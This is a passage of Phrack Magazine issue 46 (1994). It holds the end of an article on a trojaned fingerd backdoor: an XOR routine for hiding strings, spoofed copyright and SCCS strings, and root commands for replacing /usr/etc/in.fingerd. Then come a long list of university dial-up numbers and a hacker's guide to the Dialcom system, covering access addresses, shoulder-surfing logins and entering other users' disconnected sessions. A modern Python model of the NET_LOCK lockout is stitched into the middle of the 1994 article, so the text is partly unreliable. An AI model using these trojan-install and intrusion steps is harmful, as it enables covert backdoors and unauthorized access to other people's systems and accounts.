Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)

Lame or not? All alien data must be crypted.. a fast exor crypting routine will work fine, of course you can use the standard crypt function or other (slow) algorithms but since security is not important (we just want to make our texts invisible) I suggest using my fast algo. To create the exor matrix simply put all texts in a file and use the little ExorCrypt utility I have included UUencoded below (amiga/msdos version).

echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o

static char exor[]={
213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};

char *ExorCrypt(ch)
char *ch;
{
   char *b;
   b=ch;
   while ((*(ch++)^=0xa1)!=0x00);
   return(b);
}

The utility will create the exor vector (matrix) (from the 80 column formatted ascii input text) and the specific decoding function. If you do not supply a key, "$a1" will be used. Remember to add a NewLine if necessary, the vector/matrix never contains them.

Before compiling the whole thing you must add the copyright and sccsid strings I have not included (they may vary). Let's simply do: (SunOs)

#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
 All rights reserved.           ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI   <<<< SCCSID STRING
getpeername
finger
pipe
/usr/ucb/finger
No local finger program found
fork
fdopen
%s:
(((((
DDDDDDDDDD
AAAAAA
BBBBBB

The top of source becomes:

static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
 All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"

That's all. Now you can compile and install your fingerd trojan, the source was adapted for SunOS but you can port it to many unix clones without trouble.

Few final words to:

Operators: How to defeat this trojan?
First of all check the inetd.conf, then do VARIOUS fingerd checksums (maybe even the "sum" command is a trojan :) if you discover the trojan wrap the finger port so you can track down the hacker (usually all wtmp/lastlog logs are removed) or wrap everything modifying the daemons, do NOT use the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd tripwire entry to prevent future installations. Well... if the hacker is a good one everything is useless.

Beginners: You must be root to install the trojan, remember to get a copy of the original fingerd program before installing the fake version. On a Sun do:

#cc -o in.fingerd trojan.c
#mv /usr/etc/in.fingerd fingerd.old
#mv in.fingerd /usr/etc

remember to check the /etc/inetd.conf

-=- + -

To get in touch with me send E-Mail to:

Internet: hit@bix.com
X.25: QSD Nua (0)208057040540 Mbx: Hitman_Italy

if you want, use my PGP key

ExorCrypt Amiga version:

ExorCrypt MSdos version:

-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-

==Phrack Magazine== Volume Five, Issue Forty-Six, File 13 of 28

****************************************************************************

The Phrack University Dialup List

[We've been compiling all these for months now, and still have hundreds more to add. If you know dialups for any other .EDU sites or Universities elsewhere in the world that are on the Internet, please mail them to us at phrack@well.com. Please, Universities ONLY...this is a list to assist students.
:) ] ----------------------------------------------------------------------------- 201-529-6731 RAMAPO.EDU 201-596-3500 NJIT.EDU 201-648-1010 RUTGERS.EDU 203-432-9642 YALE.EDU 205-895-6792 UAH.EDU 206-296-6250 SEATTLEU.EDU 206-552-5996 WASHINGTON.EDU 685-7724 7796 209-278-7366 CSUFRESNO.EDU 209-632-7522 CALSTATE.EDU 209-474-5784 CSUSTAN.EDU 523-2173 667-3130 723-2810 210-381-3681 PANAM.EDU 3590 210-982-0289 UTB.EDU 212-206-1571 NEWSCHOOL.EDU 229-5326 212-854-1812 COLUMBIA.EDU 1824 1896 3726 9924 212-995-3600 NYU.EDU 4343 213-225-6028 CALSTATELA.EDU 213-259-2732 OXY.EDU 213-740-9500 USC.EDU 214-368-1721 SMU.EDU 3131 215-359-5071 DCCC.EDU 215-436-2199 WCUPA.EDU 6935 215-489-0351 URSINIUS.EDU 215-572-5784 BEAVER.EDU 215-641-6436 MC3.EDU 215-204-1010 TEMPLE.EDU 9630 9638 215-889-1336 PSU.EDU 215-895-1600 DREXEL.EDU 5896 215-896-1318 HAVERFORD.EDU 1824 215-898-8670 UPENN.EDU 6184 0834 3157 216-368-8888 CWRU.EDU 217-333-4000 UIUC.EDU 3700 244-5109 4976 255-9000 219-237-4116 INDIANA.EDU 4117 4186 4187 4190 4413 4415 262-1082 481-6905 980-6553 6556 6866 6869 219-989-2900 PURDUE.EDU 301-403-4444 UMD.EDU 303-270-4865 COLORADO.EDU 447-1564 492-0346 1900 1949 1953 1968 1998 938-1283 303-458-3588 REGIS.EDU 303-556-4982 MSCD.EDU 623-0763 0774 892-1014 303-698-0515 DU.EDU 871-3319 3324 4770 309-438-8070 ILSTU.EDU 8200 309-677-3250 BRADLEY.EDU 310-769-1892 CALSTATE.EDU 310-985-9540 CSULB.EDU 312-362-1061 DEPAUL.EDU 312-413-3200 UIC.EDU 3212 312-753-0975 UCHICAGO.EDU 313-764-4800 MERIT.EDU 258-6811 313-487-4451 EMICH.EDU 314-883-7000 MISSOURI.EDU 315-443-1320 SYR.EDU 1330 3396 1045 317-285-1000 BSU.EDU 1003 1005 1019 1048 1064 1068 1070 1076 1077 1087 1088 1089 1090 1099 1107 1108 317-494-6106 PURDUE.EDU 496-2000 317-455-2426 INDIANA.EDU 973-8265 318-261-9662 USL.EDU 9674 319-335-6200 UIOWA.EDU 402-280-2119 CREIGHTON.EDU 404-727-8644 EMORY.EDU 404-894-2191 GATECH.EDU 2193 2195 407-722-2202 FIT.EDU 407-823-2020 UCF.EDU 407-835-4488 PBAC.EDU 408-425-8930 UCSC.EDU 408-554-5050 SCU.EDU 
9652 408-924-1054 CALSTATE.EDU 409-294-1965 SHSU.EDU 409-568-6028 SFASU.EDU 410-329-3281 UMD.EDU 744-8000 333-7447 410-516-4620 JHU.EDU 5350 410-788-7854 UMBC.EDU 410-837-5750 UBALT.EDU 412-396-5101 DUQ.EDU 412-578-9896 CMU.EDU 268-6901 856-0815 412-621-5954 PITT.EDU 2582 3655 3720 8072 836-7123 9997 412-938-4063 CUP.EDU 413-538-2345 MTHOLYOKE.EDU 413-545-0755 UMASS.EDU 3161 3050 3056 5345 3100 3780 413-585-3769 SMITH.EDU 413-597-3107 WILLIAMS.EDU 415-333-1077 CALSTATE.EDU 415-338-1200 SFSU.EDU 2400 415-380-0000 STANFORD.EDU 416-492-0239 TORONTO.EDU 501-575-3150 UARK.EDU 3506 7254 7266 8690 502-588-7027 LOUISVILLE.EDU 6020 8999 503-245-5511 PCC.EDU 503-346-5975 UOREGON.EDU 2150 3536 503-370-2500 WILLAMETTE.EDU 503-725-3100 PDX.EDU 3144 3201 5220 5401 503-737-1513 ORST.EDU 1517 1560 1569 503-777-7757 REED.EDU 504-286-7300 UNO.EDU 504-334-1024 LSU.EDU 505-277-9990 UNM.EDU 5950 6390 505-646-4942 NMSU.EDU 508-798-0166 WPI.EDU 509-375-9326 WSU.EDU 510-643-9600 BERKELEY.EDU 510-727-1841 CSUHAYWARD.EDU 512-245-2631 SWT.EDU 512-471-9420 UTEXAS.EDU 475-9996 513-327-6188 WITTENBERG.EDU 513-556-7000 UC.EDU 517-336-3200 MSU.EDU 351-9640 518-276-2856 RPI.EDU 8898 8400 2857 2858 8990 518-435-4110 ALBANY.EDU 4160 519-725-5100 WATERLOO.EDU 601-325-4060 MSSTATE.EDU 2830 8348 602-435-3444 MARICOPA.EDU 602-965-7860 ASU.EDU 603-643-6300 DARTMOUTH.EDU 604-753-3245 MALPITA.EDU 606-622-2340 EKU.EDU 606-257-1232 UKY.EDU 1353 1361 1474 2836 4244 5627 258-1996 2400 1200 323-1996 2400 2700 609-258-2630 PRINCETON.EDU 609-896-3959 RIDER.EDU 610-683-3692 KUTZTOWN.EDU 612-626-1920 UMN.EDU 2460 9600 614-292-3103 OHIO-STATE.EDU 3112 3124 3196 614-593-9124 OHIOU.EDU 615-322-3551 VANDERBILT.EDU 3556 343-0446 1524 615-372-3900 TNTECH.EDU 615-974-3201 UTK.EDU 4282 6711 6741 6811 8131 616-394-7120 HOPE.EDU 617-258-7111 MIT.EDU 257-6222 617-287-4000 UMB.EDU 265-8503 617-353-3500 BU.EDU 4596 9118 9415 9600 617-373-8660 NEU.EDU 617-437-8668 NORTHEASTERN.EDU 617-495-7111 HARVARD.EDU 617-727-5920 MASS.EDU 
619-292-7514 UCSD.EDU 436-7148 452-4390 4398 8280 8238 9367 453-9366 480-0651 534-5890 6900 6908 558-7047 7080 9097 619-594-7700 SDSU.EDU 619-752-7964 CSUSM.EDU 702-895-3955 UNLV.EDU 703-831-5393 RUNET.EDU 703-993-3536 GMU.EDU 707-664-8093 CALSTATE.EDU 822-6205 707-826-4621 HUMBOLDT.EDU 708-467-1500 NWU.EDU 713-749-7700 UH.EDU 7741 7751 714-364-9496 CALSTATE.EDU 714-773-3111 FULLERTON.EDU 526-0334 714-856-8960 UCI.EDU 716-273-2400 ROCHESTER.EDU 716-645-6128 BUFFALO.EDU 719-594-9850 UCCS.EDU 535-0044 801-581-5650 UTAH.EDU 8105 585-4357 5550 803-656-1700 CLEMSON.EDU 804-594-7563 CNU.EDU 804-924-0577 VIRGINIA.EDU 982-5084 805-549-9721 CALSTATE.EDU 643-6386 805-664-0551 CSUBAK.EDU 805-756-7025 CALPOLY.EDU 805-893-8400 UCSB.EDU 806-742-1824 TTU.EDU 808-946-0722 HAWAII.EDU 956-2294 810-939-3370 UMICH.EDU 812-855-4211 INDIANA.EDU 4212 9656 9681 944-8725 9820 945-6114 814-269-7950 PITT.EDU 7970 362-7597 7558 827-4486 814-863-0459 PSU.EDU 4820 9600 865-2424 816-235-1491 UMKC.EDU 1492 1493 6020 818-701-0478 CSUN.EDU 901-678-2834 MEMST.EDU 904-392-5533 UFL.EDU 904-646-2772 UNF.EDU 2735 906-487-1530 MTU.EDU 907-474-0772 ALASKA.EDU 789-1314 908-571-3555 MONMOUTH.EDU 908-932-4333 RUTGERS.EDU 909-595-3779 CSUPOMONA.EDU 909-595-5993 CALPOLY.EDU 598-7104 909-621-8233 HMC.EDU 909-621-8455 POMONA.EDU 8332 909-621-8361 CLAREMONT.EDU 8313 8108 8509 909-880-8833 CSUSB.EDU 913-864-5310 UKANS.EDU 897-8650 916-456-1441 CSUS.EDU 737-0955 916-752-7900 UCDAVIS.EDU 7920 7950 916-894-3033 CSUCHICO.EDU 919-681-4900 DUKE.EDU 919-759-5814 WFU.EDU 919-962-9911 UNC.EDU ----------------------------------------------------------------------------- Canada 204-275-6100 umanitoba.ca 6132 6150 306-586-5550 University of Regina 306-933-9400 University of Saskatchewan 403-492-0024 University of Alberta 0096 3214 416-978-3959 University of Toronto 8171 418-545-6010 Universite du Quebec a Chicoutimi 418-656-7700 laval u 3131 5523 506-453-4551 University of New Brunswick 4560 4609 452-6393 514-285-6401 
uquebec.ca 514-340-4449 polymtl.ca 4450 4951 343-2411 514-398-8111 McGill University 8211 8711 514-733-2394 Universite de Montreal 1271 0832 514-343-2411 7835 514-848-8800 concordia.ca 7494 8828 4585 8834 7370 519-661-3511 University of Western Ontario 3512 3513 519-252-1101 Windsor University 519-725-5100 University of Waterloo 1392 604-291-4700 simon fraser u 4721 5947 604-721-2839 univ of victoria 6148 604-822-9600 University of British Columbia 613-788-3900 Carleton University 564-5600 613-548-8258 Queen's University 545-0383 613-564-3225 University of Ottawa 5926 613-230-1439 York University 705-741-3350 Trent University 3351 4637 709-737-8302 Memorial Univ. of Newfoundland 807-346-7770 Lakehead University 819-569-9041 usherb.ca 821-8025 819-822-9723 bishop u 819-595-2028 Universite du Quebec a Hull 902-542-1585 acadiau.edu 902-425-0800 tuns.ca 420-7945 902-429-8270 Saint Mary's University 902-494-2500 Dalhousie University 8000 902-566-0354 University of Prince Edward Island 905-570-1889 McMaster University 1046 ----------------------------------------------------------------------------- The Rest of the World 31-40-435049 tue.nl 455215 430032 34-1-582-1941 Facultad de Odontologia 3-333-9954 Barcelona Polytechnic 8991 Univ of Barcelona 581-2091 691-5881 Polytechnic University 34-7-656-6553 Univ of Zaragosa 0108 6654 44-3-34-2755 st-andrews.ac.uk 44-71-413-0790 birkbeck college 44-524-843878 lancashire 44-785-214479 staffs.ac.uk 49-621-292-1020 uni-mannheim.de 121-0251 49-631-205-2150 uni-kl.de 3554 3629 3630 49-8421-5665 ku-eichstett.de 49-8452-70035 tu-muenchen.de 61-8-223-2657 Univ of Adelaide 61-9-351-9544 Curtin U 61-9-381-1630 uwa.edu.au 2200 3054 82-2-962 kaist.ac.kr 886-2-363-9529 NAT TECH U, TAIWAN ==Phrack Magazine== Volume Five, Issue Forty-Six, File 14 of 28 **************************************************************************** A L I T T L E A B O U T D I A L C O M *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* by Herd Beast (hbeast@phantom.com) 
Introduction
~~~~~~~~~~~

Dialcom is an interesting system for hackers for two reasons: First, it is used by business people, reporters and many others worldwide, and it offers a variety of information services, from a bulletin board to stock market updates and news services. Second, Dialcom runs on Prime machines, so using Dialcom is a good way to learn Prime. True, it's not the best, as access is generally restricted, but it's better than, say, learning VMS from Information America.

These days, when everyone seems to be so centered on the Internet and the latest Unix holes, it's important to remember that the information super-highway is not quite here, and many interesting things are out there and not on the Internet. Phrack has always been a good place to find out more about these things and places, and I wrote this article after reading the Dialog articles in Phrack.

Well, gentle reader, I guess that my meaning-of-life crap quota is full, so let's move on.

Accessing Dialcom and Logging In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet, and other networks as well as dialin modems. Since I am not writing to Washington people only, I will specify only the easiest methods -- Tymnet and Sprintnet -- and some of the more interesting access methods.

Dialcom is basically a Primecom network. Each user has an account on one or more of the systems connected to that network. To access Dialcom, the user needs to access the machine his account is on. First, he logs into a public data network and follows the steps required to connect to a remote node. On Tymnet, this means getting to the "please log in:" prompt, and on Sprintnet it's the famous '@' prompt.

For Tymnet, you must enter at the prompt: DIALCOM; (e.g., DIALCOM;57). The same goes for TYMUSA connection from outside the USA.
For Sprintnet or other PADs, you must enter the correct NUA:

    System #    Sprintnet NUA    Tymnet NUA
    ========    =============    =============
    XX          3110 301003XX    3106 004551XX
    (32, 34, 41 - 46, 50, 52, 57, 61, 63, 64)

It should be noted that Dialcom keeps its own X.25 network, Dialnet, and the NUAs on it are those of the systems (connect to address "57" for system 57).

Dialcom has other access methods, meant to be used from outside the USA, but sometimes available from within as well.

One is a COMCO card, which is inserted into a reader connected to the computer and the modem through a serial link. The user then calls a special dial-up number, and can connect to Dialcom (or any other NUA). The card contains a number of "tax units" which are deducted as the connection goes through, until they are exhausted and the card is useless. The user calls the dial-up and types in ".". The amount of tax units on the card will then appear on the screen, and the user can connect to a host. COMCO dial-ups:

    Location                   Number
    =======================    ==============
    Australia                  +61-02-2813511
    Belgium                    +32-02-5141710
    France                     +33-1-40264075
    West Germany               +49-069-290255
    Hong Kong                  +852-5-8611655
    Netherlands                +31-020-6624661
    Switzerland                +41-022-865507
    United Kingdom             +45-01-4077077
    USA (Toll Free)            +1-800-777-4445
    USA                        +1-212-747-9051

The other way is through Infonet. I will not turn this into an Infonet guide, save to write the logon sequence needed to access Dialcom. At the '#' prompt, enter 'C'. At the "Center:" prompt, enter "DC". Dialcom NUAs are 31370093060XX, where XX is the system number.

Once the connection to a Dialcom system has been established, you will be greeted by the Prime header:

    Primecom Network 19.4Q.111 System 666

    Please Sign On
    >

And the '>' prompt. This is a limited prompt as most commands cannot be issued at it, so you need to login.

Dialcom user id's are typically 3 alphabetic characters followed by several digits.
The password may contain any character except for ",;/*" or spaces, and my experience shows that they tend to be of intermediate complexity (most will not be found in a dictionary, but could be cracked).

Password security may become useless at this point, because the Dialcom Prime systems allow ID to take both user id and password as arguments (which some other Primes do not) and in fact, Dialcom tutorials tell users to log on like this --

    >ID HBT007 IMEL8

-- which makes ``shoulder surfing'' easier.

Once you log on, you will see:

    Dialcom Computer Services 19.4Q.111(666)

    On At 14:44 07/32/94 EDT
    Last On At 4:09 06/44/94 EDT

    >

And again, the '>' prompt.

    >off
    Off At 14:45 07/32/94 EDT
    Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.

Security at Dialcom
~~~~~~~~~~~~~~~~~~

As mentioned, while passwords are relatively secure, the manner in which they are entered is usually not.

As for the accounts themselves, it's important to understand the general way accounts exist on Dialcom. Dialcom users are usually part of a business that has an ``account group'' on Dialcom. Each user gets an account from that group (HBT027, HBT054). Each group also has a group administrator, who controls what each account can access. The administrator determines which programs (provided by Dialcom) each user can access. A foreign correspondent for a magazine might have access to the news services while other users might not. The administrator also determines how much the user can interface with the Prime OS itself. Each user can run a few basic commands (list files, delete, sign off) but above that, it's up to the administrator. The administrator may opt to remove a user from the controlling menuing system -- in which case, the user has no restrictions forced upon him.

Group administrators, however, handle only their groups, and not the Dialcom system. They need, for example, to notify Dialcom staff if they want an account removed from the system.
Another (different yet combined) part of the account/group security is the accounts' ``security levels'' (seclevs). Seclevs range from 3 to 7, and determine the access an account has to various places. Seclev 4 users, for example, are not restricted to seeing only users of their group on the system, and can delete accounts from the menuing system.

User accounts own their directories and the files within (but high seclevs can read other users' files). Each account's security is left to some extent to its owner, in that the user sets his own password. When setting a password, a user can set a secondary password. Any user wishing to access that user's directory will need that password. Furthermore, the user can allow other users to attach as owners to his directory if they know his password (come to think of it, couldn't they just login as him?). This is all controlled by the PASSWD program (see ``Common Commands'', below).

Dialcom also allows for login attempt security using the NET_LOCK program. NET_LOCK blocks login attempts from addresses that have registered too many login failures over a period of time (by default, an address that has registered more than 10 failed logins within 5 minutes is blocked for 10 minutes). NET_LOCK -DISPLAY is accessible to users of Seclev 5 and shows addresses currently blocked and general information. Other options are accessible to Seclev 7 and are: -ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block an address), -LOCK_PERIOD (the period in which these attempts must occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the lockout feature is disabled).

A little unrelated is the network reconnect feature of the Prime computers. When a user gets disconnected from the system because of a network failure, or for any other reason which is not the system's fault, he can log back in and reconnect into the disconnected job.
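One way to model the NET_LOCK rule described above, as an added example (not Dialcom's code and not part of the original article). The class and method names, the use of plain seconds for time, the treatment of -WINDOW as a (start, end) interval, and the ADDR-A/ADDR-B addresses are assumptions made for illustration; the default numbers are the ones the article gives.

```python
from collections import defaultdict, deque


class NetLock:
    """Per-address lockout after repeated failed logins (a model of NET_LOCK)."""

    def __init__(self, attempts=10, lock_period=300, lock_time=600, window=None):
        self.attempts = attempts          # -ATTEMPTS: failures tolerated per period
        self.lock_period = lock_period    # -LOCK_PERIOD: seconds the failures must fall in
        self.lock_time = lock_time        # -LOCK_TIME: seconds an address stays blocked
        self.window = window              # -WINDOW: (start, end) with lockout disabled
        self.enabled = True               # -ON / -OFF
        self._failures = defaultdict(deque)   # address -> times of recent failures
        self._blocked_until = {}              # address -> time the block expires

    def _active(self, now):
        """Lockout applies unless switched off or inside the exemption window."""
        if not self.enabled:
            return False
        return not (self.window and self.window[0] <= now < self.window[1])

    def is_blocked(self, addr, now):
        until = self._blocked_until.get(addr)
        if until is not None and now >= until:
            del self._blocked_until[addr]     # the block has expired
            until = None
        return until is not None and self._active(now)

    def record_failure(self, addr, now):
        """Count one failed login; return True if it triggered a block."""
        if not self._active(now):
            return False                      # assumption: nothing is counted here
        recent = self._failures[addr]
        recent.append(now)
        while recent and recent[0] <= now - self.lock_period:
            recent.popleft()                  # forget failures outside the period
        if len(recent) > self.attempts:       # "more than 10 failed logins"
            self._blocked_until[addr] = now + self.lock_time
            recent.clear()
            return True
        return False

    def login(self, addr, now, password_ok):
        """Gate one attempt; a blocked address is refused before any password check."""
        if self.is_blocked(addr, now):
            return "blocked"
        if password_ok:
            return "ok"
        return "locked" if self.record_failure(addr, now) else "failed"

    def display(self, now):
        """Rough equivalent of NET_LOCK -DISPLAY: blocked addresses, seconds left."""
        return {a: u - now for a, u in sorted(self._blocked_until.items())
                if self.is_blocked(a, now)}


# Constructed sample: (seconds since start, calling address, password_ok).
# ADDR-A and ADDR-B are placeholders, not real network addresses.
SAMPLE = [(i * 20, "ADDR-A", False) for i in range(11)]   # 11 failures in 200 s
SAMPLE += [(150, "ADDR-B", False), (210, "ADDR-A", True),
           (220, "ADDR-B", True), (801, "ADDR-A", True)]


def replay(events, lock):
    """Feed events in time order and return the outcome of each one."""
    return [(t, addr, lock.login(addr, t, ok)) for t, addr, ok in sorted(events)]


if __name__ == "__main__":
    for row in replay(SAMPLE, NetLock()):
        print(*row)
```

In the replay, ADDR-A is refused at 210 seconds even with the right password and admitted again once the 10-minute block has expired, while ADDR-B, with a single failure, is never affected.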
When a disconnected job is waiting, the user sees, upon logging on:

    You Have a Disconnected Job:

    HBT007 d09 1 109 NT NETLINK 989898989 6 3

    Do You Want to Reconnect?

Which means user HBT007's job #9 (a NETLINK command) is waiting for a reconnection. At this point, the user can continue, leaving the job to hang until the system signs it off when a certain amount of time expires; sign the job off himself; or reconnect to that job. (Try "HELP" at the prompt.)

This wouldn't be important, but experience shows that many disconnections occur when someone logs into Dialcom over a network, and then uses NETLINK (or another program) to connect to another site over a network, and somewhere, some time, he issues a control sequence (let's say to tell NETLINK to do something) that gets processed by the first network, which logs him off. So there is potential to log into the middle of people's sessions (yeah, like detached ttys).

Common Commands
~~~~~~~~~~~~~~

Common commands are in reality the basic Prime commands that every account has access to. Here they are, in alphabetical order.

`CLEAR'  Clear the screen.

`DATE'  Shows the date at which a command was entered. Output:

    >DATE
    Proceed to next command
    >BAH
    Friday, June 38, 1994 10:01:00 AM EDT

`DEL'  Deletes a file.

`DELP'  Deletes several files based on wildcards. Can verify deletion of every file, and delete only files modified before, after, or between certain dates.

`ED'  Is the default and simplest file editor on Dialcom (some of its brothers are JED and FED). Once invoked, ED enters INPUT mode, in which the user just types text. To enter EDIT mode, where you can issue commands, you need to press on a blank line (the same thing will get you from EDIT mode back to INPUT mode). The EDIT mode uses a pointer to a line. All commands are carried out on the line that the pointer points to. "T" will bring the pointer to the top of the text, "B" to the bottom, "N" to the next line down, "U" to the next line up, and "L " to the line containing .
ED commands include:

    P:     PRINT the pointer line. P will print of lines.
    C:     Change words. The format is "C/old word/new word".
    A:     Appends words. The format is "A ".
    R:     Retype pointer line. The format is "R ".
    SP:    Check the spelling of the text, and then point to the top of the text.
    SAVE:  Will save the text and exit ED.
    Q:     Will quit/abort editing and exit ED.

`F'  List all file info. Output:

    DIALCOM.TXT 001 13/30/94 13:50 ASC D W R

Which means file name "DIALCOM.TXT", size of 1 file block, last modified on 13/30/94 at 13:50, is an ASC type file, and the account has the permissions to D(elete), W(rite), and R(ead) it.

`HELP' (`?')  Displays a nicely formatted menu of available commands.

`INFO'  System info. INFO displays an information file, for example, INFO NETLINK. "INFO ?" lists info files. "INFO BRIEF" lists info files grouped by application. "INFO INFO" lists info files with their descriptions.

`L'  List all file names. Output:

    HBT007 (Owner)

    DIALCOM.TXT

`LS'  Display information about available segments and the account's access to them. Output:

    2 Private static segments.
    segment  access
    --------------
    4000     RWX
    4001     RWX

    11 Private dynamic segments.
    segment  access
    --------------
    4365     RX
    4366     RX
    4367     RWX
    4370     RWX
    4371     RX
    4372     RWX
    4373     RX
    4374     RWX
    4375     RX
    4376     RX
    4377     RWX

`NAME'  Changes UFD name. Output:

    >NAME
    Old Name: John Gacy
    UFD Name: Herd Beast
    All done
    >WHO
    Herd Beast HBT007

`NETWORK'  Accesses a database that contains dial-up numbers for Sprintnet, Tymnet, Datapac and Dialcom's Dialnet by State/City.

`OFF'  Sign off the system.

`ONLINE'  Who's online? The amount of data displayed depends on the account's seclev. Seclevs below 4 are restricted to seeing only users of their group. Output:

    HBT007 PRK017 MJR

`PAD'  Allows you to send commands to an X.29 PAD, these commands being the SET/SET?/PAR? commands and their parameter/value pairs.

`PASSWD'  Change your password.
PASSWD has two forms: a short one, which just changes the user's password, and a long form, invoked by PASSWD -LONG, which allows the user to set a second password for other users accessing his directory, and also to determine if they can have owner access to the directory.

`PROTECT'  Protects a file (removes permissions from it). "PROTECT DIALCOM.TXT" will remove all three (D, W, R) attributes from it. This will result in:

    >DEL DIALCOM.TXT
    Insufficient access rights. DIALCOM.TXT (DEL:10)

But --

    >DELETE DIALCOM.TXT
    "DIALCOM.TXT" protected, ok to force delete? y

`SECLEV'  Your security level. Output:

    Seclev=5

`SIZE'  Size information about a file. Output:

    1 Block, 404 Words

`STORAGE'  Shows storage information.

`SY'  Show users on system. (Same restrictions as for ONLINE apply.) Will show user name, time on, idle time, devices used, current jobs and state, etc. Output:

    41 Users on sys 666
    Names use idle mem State command object devs
    HBT007 *11 0 155 R1 SY 6 3 from Tymnet via X.25

`SYS'  Displays account information and system number. Output:

    HBT007 on system 666.

`TERM'  Used to tell the Dialcom computer what terminal the user is using. A list of supported terminals is generated by "TERM TERMINALS". TERM options are:

    TYPE (TYPE VT100)
    WIDTH (Terminal width, if different than default)
    TOP (Start listings at top of screen)
    PAUSE (Pause listings when screen is full)
    -ERASE, -KILL (Sets the erase or kill character)
    -BREAK (Enables or disables BREAKs)
    -HALF or -FULL (Half duplex or full duplex)
    -DISPLAY (Output current terminal information)

`WHO'  Displays account information. Output:

    HBT007

Which means user HBT007 on system 666 on device 6.

Communicating on Dialcom
~~~~~~~~~~~~~~~~~~~~~~~

Users who want to communicate on Dialcom have two choices, basically. These are the Dialcom bulletin board and electronic mail.

The Dialcom bulletin board has two versions.
The first consists of several message bases (called ``categories'') which are shared between some Dialcom systems (and mostly used by bored employees, it seems); there are also private bulletin boards, which are not shared between the systems. They belong to account groups, and only users in an account group can access that group's bulletin board system. These versions of the Dialcom board are often empty (they have no categories defined and hence are unusable).

The board is accessed by the command POST (PRPOST for the private board). Once POST is activated, it will display a prompt:

    Send, Read or Purge:

If the answer is READ, POST will ask for a category (a list of categories will be displayed if you type HELP at that prompt). Once a category has been joined, you will be able to read through the messages there:

    Subject: ?
    From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666

    quit
    /q
    /quit

    Continue to Next Item?

Answering SEND at the first prompt will allow you to send a message in a category.

Answering PURGE will allow you to delete messages posted by your account. When you enter PURGE and the category to purge messages from, the system will show you any posts that you are allowed to purge, followed by a "Disposition:" prompt. Enter DELETE to delete the message.

The second way to communicate is the Dialcom MAIL system. MAIL allows sending and receiving messages, it allows for mailing lists, filing mail into categories, holding mail to read later and so on. MAIL is invoked by entering, uh... oh, yes, MAIL. It works along similar lines to those of POST, and will display the following prompt:

    Send, Read or Scan:

SEND: Allows you to send a message. It will prompt with "To:", "Subject:" and "Text:" (where you enter the actual message, followed by ".SEND" on a blank line to end). After a message is sent, the "To:" prompt will appear again -- use "QUIT" to leave it.

A word about the "To:" prompt. There are two configuration files which make its use easier.
First, the MAIL.REF file, which is really a mailing list file. It contains entries in the format of --

    DOODZ DVR014 ABC0013 XYZ053

-- and at the "To:" prompt, you can just enter "DOODZ" and the message will be sent to all three accounts. When you enter a name, MAIL searches through your MAIL.REF, and then through the account administrator's, and only then parses it as an account name.

Second is the mail directory, which contains the names and account IDs of many users the account is in contact with. To display it, type "DIS DIR" at the first prompt. You'll get something like this:

    HERD-BEAST 6666:HBT007 WE'RE BAD AND WE'RE KRAD

Which means you can type "HERD-BEAST" at the prompt, and not just HBT007.

Also, there are special options for the "To:" prompt, the most notable being: CC to send a carbon copy; EX to send the message with ``express priority''; DAR to request that if the message is sent to a user on another Dialcom system, POSTMASTER will send you a message verifying that your message has been sent; and NOSHOW, to keep the receiver from seeing everybody else on the "To:" list. For example (all these people are in the mail directory),

    To: DUNKIN D.DREW CC FOLEY NOSHOW EX

You enter the message about to be sent at the "Text:" prompt. That mode accepts several commands (like .SEND), all of which begin with a dot. Any command available at the "To:" prompt is available here. For example, you can add or remove names from the "To:" field using ".TO " or ".TO -", and add a CC using ".CC ".

You also have a display command, ".DIS". ".DIS" alone shows the text entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows the entire header; etc.

Finally, you have editing options. ".ED" will load editing mode, so you can change the text you entered. ".LOAD " will load into the text of the message. ".SP" will check the spelling of text in the message, and there are other commands.

READ: Allows you to read mail in your mailbox.
Once you enter READ, MAIL will display the header of the first message in your mailbox (or "No mail at this time") followed by a "--More--" prompt. To read the message, press ; otherwise, enter NO. After you are done reading a message, you will be prompted with the "Disposition:" prompt, where you must determine what to do with the message. There you can enter several commands: AGAIN to read the message again; AG HE to read the header again; AP REPLY to reply to the message and append the original message to the reply; AP FO to forward the message to someone and add your comments to it; REPLY to reply to the sender of the message; REPLY ALL to reply to everybody on the "To:" field; FILE to file the message; SA to save the message into a text file; NEXT to read the next message in your mailbox; and D to delete the message.

SCAN: Allows you to see a summary of the messages in the mailbox.

Both READ and SCAN have options that allow you to filter the messages you want to read: FR to get only messages from ; TO to get only messages sent to ; 'string' to get only messages containing ``string'' in the "Subject:" field; "string" to get only messages containing ``string'' in the message itself; FILE CATEGORY to get only messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages in that date (adding a '-' before or after the date will get you everything before or after that date, and it's also possible to specify two dates separated by a '-' to get everything between those dates). For example, to get all of Al Gore's messages about Clipper before August 13th:

    READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94

There is also a QS (QuickScan) command that behaves the same as SCAN, only SCAN shows the entire header, and QS just shows the "From:" field.

However, there is more to do here than just send, read or scan. Some of it was mentioned when explaining these commands.
Both sent and received messages can be saved into a plain text file or into a special mailbox file, called MAIL.FILE. Messages filed into the MAIL.FILE can be grouped into categories in that file.

SAVING MESSAGES: Messages are saved by entering "SA filename" at a prompt. For sent messages, it's the "Text:" prompt, while entering the message, and the command is ".SA", not "SA". For received messages, it's either the "--More--" or the "Disposition:" prompt.

